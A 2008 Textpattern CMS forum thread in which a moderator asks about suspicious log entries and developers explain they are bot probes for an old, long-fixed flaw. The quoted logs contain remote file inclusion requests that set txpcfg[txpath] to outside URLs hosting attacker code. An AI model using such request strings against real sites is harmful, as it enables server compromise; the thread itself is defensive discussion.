Textpattern CMS

#1 2008-11-16 01:47:16

els

Moderator

From: The Netherlands

Registered: 2004-06-06

Posts: 7,458

Server attacks? Block user agent?

Several sites (same host, same server) show this kind of entries in the logs:

72.32.6.162 - - [02/Nov/2008:15:39:47 -0500] "GET /publish.php?txpcfg[txpath]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 406 347 "-" "libwww-perl/5.79"

216.116.7.42 - - [14/Nov/2008:16:21:56 -0500] "GET /kalender//textpattern/publish.php?txpcfg[txpath]=http://www.asa.ba/eng/administrator/components/com_admin/idbut.txt??? HTTP/1.1" 404 3299 "-" "libwww-perl/5.803"

… and so on. Lots of them. Looks like a nasty bot, should (and can) I do something against it? Should I contact my host?

#2 2008-11-16 07:08:23

Gocom

Developer Emeritus

From: Helsinki, Finland

Registered: 2006-07-14

Posts: 4,533

Website

Re: Server attacks? Block user agent?

Every site that I have made for clients (every one that is somewhat popular) gets lots of “attacks”. Basically there is nothing to worry about, absolute nothing. Only thing that those bots (or ppl do, don’t ask, but some of those attacks are made by ppl, not bots. Yes, some ppl are really f****** stupid, doing something like that from their home computer) do, are wasting their time, little your bandwidth, and basically zero-small amout CPU/load of the server.

To add I get all sorts of attacks, usually those attacks are made for random places, against random CMS/apps/server softwares that aren’t even in use. In example my somewhat personal site, Rahforum.biz, loses below 1% of bandwidth to those “attacks” (100-1000 different request per month, all from different ip, all doing that multiple times).

You can ofcourse do things against them. In example you can ban them. If they have same host/ip range, you can ban that. If those all are random IPs, then you can only ban them all seperately. One way is also automatically ban all requests to odd places, like to publish.php etc. That can be done by simple htaccess lines, contacting host or most webpanel do include ban/protection tools that can handle that. But even banned requests are handled till the ban comes up, and thus eating little of your bandwidth.

---

Rah | GitHub

#3 2008-11-16 11:51:30

wet

Developer Emeritus

From: Schoerfling, Austria

Registered: 2005-06-06

Posts: 3,323

Website Mastodon

Re: Server attacks? Block user agent?

These are attempts to exploit a very old security flaw in an ancient Textpattern pre-beta release, which has been fixed for ages. Nevertheless, the kiddies have fun with it for reasons which evade me. Don’t bother to spend any quality time on it, and I wouldn’t bug your host either.

#4 2008-11-16 15:13:51

els

Moderator

From: The Netherlands

Registered: 2004-06-06

Posts: 7,458

Re: Server attacks? Block user agent?

Thank you both! I wasn’t really worried but know too little about this kind of thing to understand what it means. I won’t bother then and let them have their fun ;)